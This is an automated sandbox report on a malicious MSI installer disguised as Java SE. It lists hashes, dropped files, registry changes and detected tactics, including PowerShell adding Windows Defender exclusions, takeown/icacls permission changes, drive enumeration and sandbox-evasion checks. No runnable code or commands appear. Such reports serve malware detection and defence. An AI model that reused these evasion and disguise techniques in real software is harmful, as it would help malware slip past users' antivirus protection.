Analysis

max time kernel: 149s
max time network: 150s
platform: windows10-2004_x64
resource: win10v2004-20240802-en
resource tags: arch:x64 arch:x86 image:win10v2004-20240802-en locale:en-us os:windows10-2004-x64 system
submitted: 02-10-2024 16:20
Static task: static1
Behavioral task: behavioral1
  Sample: 0b8b4d1854add7dfc1a27b1e93fb002b_JaffaCakes118.msi
  Resource: win7-20240903-en
Behavioral task: behavioral2
  Sample: 0b8b4d1854add7dfc1a27b1e93fb002b_JaffaCakes118.msi
  Resource: win10v2004-20240802-en
General

Target: 0b8b4d1854add7dfc1a27b1e93fb002b_JaffaCakes118.msi
Size: 3.9MB
MD5: 0b8b4d1854add7dfc1a27b1e93fb002b
SHA1: 38cecb90eb2b89d81db27a988ff09ce20db26e8e
SHA256: dee25db703acc220d63785d7a72cce3817305642f5da1dc6f155d5d693bcde88
SHA512: 746d3f81089bf4210a831b5f5a8bec6fa946fe2cb071eb03cce2702c1e79f198cf40a7eafc89067923282a11d583188c885de8fd7d656367ee0b2ba1b861dd34
SSDEEP: 98304:nxnFFK+GEWJRgsnAWE05y4faRXsYA+tiQDnIjlBzpA7iQTWKKhgblL0n:JFFKZEWJtni7XpA+MSIjl5pQnTWth
Malware Config

Signatures
Command and Scripting Interpreter: PowerShell (1 TTPs, 22 IoCs)
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
  pid   Process
  3132  powershell.exe
  3380  powershell.exe
  4732  powershell.exe
  1232  powershell.exe
  4488  powershell.exe
  4812  powershell.exe
  4328  powershell.exe
  2812  powershell.exe
  4364  powershell.exe
  3200  powershell.exe
  3232  powershell.exe
  4460  powershell.exe
  3000  powershell.exe
  4832  powershell.exe
  1644  powershell.exe
  892   powershell.exe
  4396  powershell.exe
  4356  powershell.exe
  4008  powershell.exe
  4472  powershell.exe
  2840  powershell.exe
  4756  powershell.exe
Possible privilege escalation attempt (3 IoCs)
Processes:
  pid   Process
  1992  takeown.exe
  532   icacls.exe
  2592  icacls.exe
Modifies file permissions (1 TTPs, 3 IoCs)
Processes:
  pid   Process
  1992  takeown.exe
  532   icacls.exe
  2592  icacls.exe
Blocklisted process makes network request (4 IoCs)
Processes:
  flow  pid  Process
  4     844  msiexec.exe
  8     844  msiexec.exe
  10    844  msiexec.exe
  14    844  msiexec.exe
Enumerates connected drives (3 TTPs, 46 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
  description              ioc     Process
  File opened (read-only)  \??\B:  msiexec.exe
  File opened (read-only)  \??\K:  msiexec.exe
  File opened (read-only)  \??\A:  msiexec.exe
  File opened (read-only)  \??\G:  msiexec.exe
  File opened (read-only)  \??\M:  msiexec.exe
  File opened (read-only)  \??\Y:  msiexec.exe
  File opened (read-only)  \??\A:  msiexec.exe
  File opened (read-only)  \??\E:  msiexec.exe
  File opened (read-only)  \??\N:  msiexec.exe
  File opened (read-only)  \??\T:  msiexec.exe
  File opened (read-only)  \??\V:  msiexec.exe
  File opened (read-only)  \??\E:  msiexec.exe
  File opened (read-only)  \??\R:  msiexec.exe
  File opened (read-only)  \??\H:  msiexec.exe
  File opened (read-only)  \??\L:  msiexec.exe
  File opened (read-only)  \??\W:  msiexec.exe
  File opened (read-only)  \??\W:  msiexec.exe
  File opened (read-only)  \??\J:  msiexec.exe
  File opened (read-only)  \??\T:  msiexec.exe
  File opened (read-only)  \??\U:  msiexec.exe
  File opened (read-only)  \??\Z:  msiexec.exe
  File opened (read-only)  \??\B:  msiexec.exe
  File opened (read-only)  \??\Q:  msiexec.exe
  File opened (read-only)  \??\S:  msiexec.exe
  File opened (read-only)  \??\V:  msiexec.exe
  File opened (read-only)  \??\I:  msiexec.exe
  File opened (read-only)  \??\J:  msiexec.exe
  File opened (read-only)  \??\M:  msiexec.exe
  File opened (read-only)  \??\Q:  msiexec.exe
  File opened (read-only)  \??\X:  msiexec.exe
  File opened (read-only)  \??\G:  msiexec.exe
  File opened (read-only)  \??\P:  msiexec.exe
  File opened (read-only)  \??\R:  msiexec.exe
  File opened (read-only)  \??\U:  msiexec.exe
  File opened (read-only)  \??\X:  msiexec.exe
  File opened (read-only)  \??\I:  msiexec.exe
  File opened (read-only)  \??\O:  msiexec.exe
  File opened (read-only)  \??\Z:  msiexec.exe
  File opened (read-only)  \??\L:  msiexec.exe
  File opened (read-only)  \??\O:  msiexec.exe
  File opened (read-only)  \??\S:  msiexec.exe
  File opened (read-only)  \??\Y:  msiexec.exe
  File opened (read-only)  \??\H:  msiexec.exe
  File opened (read-only)  \??\K:  msiexec.exe
  File opened (read-only)  \??\N:  msiexec.exe
  File opened (read-only)  \??\P:  msiexec.exe
File and Directory Permissions Modification: Windows File and Directory Permissions Modification (1 TTPs)
Drops file in Program Files directory (27 IoCs)
Processes:
  description   ioc                                                                                          Process
  File created  C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-string-l1-1-0.dll  msiexec.exe
  File created  C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\patch_service.exe  msiexec.exe
  File created  C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-environment-l1-1-0.dll  msiexec.exe
  File created  C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-utility-l1-1-0.dll  msiexec.exe
  File created  C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\vcruntime140_1.dll  msiexec.exe
  File created  C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-timezone-l1-1-0.dll  msiexec.exe
  File created  C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-math-l1-1-0.dll  msiexec.exe
  File created  C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-runtime-l1-1-0.dll  msiexec.exe
  File created  C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-stdio-l1-1-0.dll  msiexec.exe
  File created  C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\SyncMonitor.dll  msiexec.exe
  File created  C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-convert-l1-1-0.dll  msiexec.exe
  File created  C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-synch-l1-2-0.dll  msiexec.exe
  File created  C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-filesystem-l1-1-0.dll  msiexec.exe
  File created  C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-process-l1-1-0.dll  msiexec.exe
  File created  C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-localization-l1-2-0.dll  msiexec.exe
  File created  C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-locale-l1-1-0.dll  msiexec.exe
  File created  C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-time-l1-1-0.dll  msiexec.exe
  File created  C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\Register.exe  msiexec.exe
  File created  C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\vcruntime140.dll  msiexec.exe
  File created  C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-processthreads-l1-1-1.dll  msiexec.exe
  File created  C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-conio-l1-1-0.dll  msiexec.exe
  File created  C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-heap-l1-1-0.dll  msiexec.exe
  File created  C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-file-l2-1-0.dll  msiexec.exe
  File created  C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-multibyte-l1-1-0.dll  msiexec.exe
  File created  C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-crt-private-l1-1-0.dll  msiexec.exe
  File created  C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\setup.bat  msiexec.exe
  File created  C:\Program Files (x86)\Sun Technology Network\Oracle Java SE\api-ms-win-core-file-l1-2-0.dll  msiexec.exe
Drops file in Windows directory (14 IoCs)
Processes:
  description                   ioc                                                                          Process
  File opened for modification  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log  msiexec.exe
  File created                  C:\Windows\Installer\inprogressinstallinfo.ipi  msiexec.exe
  File created                  C:\Windows\Installer\e5777a3.msi  msiexec.exe
  File opened for modification  C:\Windows\Installer\{D475A886-3AC6-4816-B147-DC43D33F3540}\Logo.ico  msiexec.exe
  File opened for modification  C:\Windows\Installer\MSI7B4D.tmp  msiexec.exe
  File created                  C:\Windows\Installer\e5777a1.msi  msiexec.exe
  File opened for modification  C:\Windows\Installer\  msiexec.exe
  File created                  C:\Windows\Installer\SourceHash{D475A886-3AC6-4816-B147-DC43D33F3540}  msiexec.exe
  File opened for modification  C:\Windows\Installer\MSI7986.tmp  msiexec.exe
  File opened for modification  C:\Windows\Installer\MSI7AFE.tmp  msiexec.exe
  File created                  C:\Windows\Installer\wix{D475A886-3AC6-4816-B147-DC43D33F3540}.SchedServiceConfig.rmi  MsiExec.exe
  File opened for modification  C:\Windows\Installer\MSI7976.tmp  msiexec.exe
  File created                  C:\Windows\Installer\{D475A886-3AC6-4816-B147-DC43D33F3540}\Logo.ico  msiexec.exe
  File opened for modification  C:\Windows\Installer\e5777a1.msi  msiexec.exe
Loads dropped DLL (3 IoCs)
Processes:
  pid   Process
  692   MsiExec.exe
  2500  MsiExec.exe
  2500  MsiExec.exe
Event Triggered Execution: Installer Packages (2 TTPs, 1 IoCs)
System Location Discovery: System Language Discovery (1 TTPs, 31 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
  description  ioc                                                        Process
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  cmd.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  cmd.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  MsiExec.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  taskkill.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  MsiExec.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  icacls.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  explorer.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  takeown.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  icacls.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
  Key opened   \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language  powershell.exe
Checks processor information in registry (2 TTPs, 2 IoCs)
Processor information is often read in order to detect sandboxing environments.
Processes:
  description        ioc                                                               Process
  Key opened         \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0  explorer.exe
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz  explorer.exe
Kills process with taskkill (1 IoCs)
Processes:
  pid   Process
  2140  taskkill.exe
Processes:
explorer.exedescription ioc Process Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Software\Microsoft\Internet Explorer\Toolbar explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" explorer.exe Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 explorer.exe -
Modifies data under HKEY_USERS (64 IoCs)
Processes:
  description      ioc                                                                                       Process
  Key created      \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs  powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs  powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs  powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot  powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust  powershell.exe
  Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"  powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs  powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs  powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs  powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs  powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates  powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates  powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates  powershell.exe
  Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"  powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs  powershell.exe
  Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"  powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates  powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust  powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates  powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA  powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing  powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates  powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs  powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs  powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs  powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs  powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs  powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs  powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs  powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed  powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople  powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust  powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs  powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs  powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates  powershell.exe
  Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"  powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs  powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs  powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed  powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates  powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates  powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates  powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot  powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA  powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates  powershell.exe
  Set value (int)  \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"  powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs  powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates  powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust  powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs  powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\  powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs  powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates  powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates  powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates  powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing  powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates  powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates  powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs  powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates  powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs  powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates  powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates  powershell.exe
  Key created      \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates  powershell.exe
Modifies registry class (43 IoCs)
Processes:
  description       ioc                                                                                       Process
  Key created       \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\688A574D6CA361841B74CD343DF35304  msiexec.exe
  Key created       \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0  explorer.exe
  Set value (int)   \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1"  explorer.exe
  Key created       \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1  explorer.exe
  Set value (str)   \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\688A574D6CA361841B74CD343DF35304\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\"  msiexec.exe
  Key created       \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell  explorer.exe
  Key created       \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\  explorer.exe
  Set value (str)   \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\688A574D6CA361841B74CD343DF35304\ProductName = "Java SE"  msiexec.exe
  Key created       \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\3434171B899944440BE5255593F74797  msiexec.exe
  Set value (data)  \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\688A574D6CA361841B74CD343DF35304\Clients = 3a0000000000  msiexec.exe
  Set value (data)  \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e80922b16d365937a46956b92703aca08af0000  explorer.exe
  Key created       \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0  explorer.exe
  Key created       \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags  explorer.exe
  Set value (str)   \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\688A574D6CA361841B74CD343DF35304\PackageCode = "9D60AB34E1F9AF540951EAB0CA4EB4A5"  msiexec.exe
  Set value (str)   \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\688A574D6CA361841B74CD343DF35304\ProductIcon = "C:\\Windows\\Installer\\{D475A886-3AC6-4816-B147-DC43D33F3540}\\Logo.ico"  msiexec.exe
  Key created       \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\688A574D6CA361841B74CD343DF35304\SourceList  msiexec.exe
  Key created       \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\688A574D6CA361841B74CD343DF35304\SourceList\Net  msiexec.exe
  Key created       \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\688A574D6CA361841B74CD343DF35304\SourceList\Media  msiexec.exe
  Key created       \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU  explorer.exe
  Set value (data)  \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots  explorer.exe
  Set value (data)  \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02  explorer.exe
  Key created       \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell  explorer.exe
  Set value (str)   \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\688A574D6CA361841B74CD343DF35304\ProductFeature  msiexec.exe
  Set value (int)   \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\688A574D6CA361841B74CD343DF35304\InstanceType = "0"  msiexec.exe
  Set value (str)   \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\3434171B899944440BE5255593F74797\688A574D6CA361841B74CD343DF35304  msiexec.exe
  Set value (data)  \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff  explorer.exe
  Set value (int)   \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\688A574D6CA361841B74CD343DF35304\Version = "134217999"  msiexec.exe
  Set value (int)   \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\688A574D6CA361841B74CD343DF35304\Assignment = "1"  msiexec.exe
  Set value (str)   \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\688A574D6CA361841B74CD343DF35304\SourceList\Media\1 = ";"  msiexec.exe
  Set value (int)   \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\688A574D6CA361841B74CD343DF35304\AdvertiseFlags = "388"  msiexec.exe
  Set value (int)   \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\688A574D6CA361841B74CD343DF35304\DeploymentFlags = "3"  msiexec.exe
  Set value (str)   \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\688A574D6CA361841B74CD343DF35304\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\"  msiexec.exe
  Key created       \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings  explorer.exe
  Set value (data)  \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff  explorer.exe
  Set value (data)  \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000  explorer.exe
  Set value (data)  \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff  explorer.exe
  Key created       \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\  explorer.exe
  Key created       \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\688A574D6CA361841B74CD343DF35304  msiexec.exe
  Set value (int)   \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\688A574D6CA361841B74CD343DF35304\Language = "1033"  msiexec.exe
  Set value (int)   \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\688A574D6CA361841B74CD343DF35304\AuthorizedLUAApp = "0"  msiexec.exe
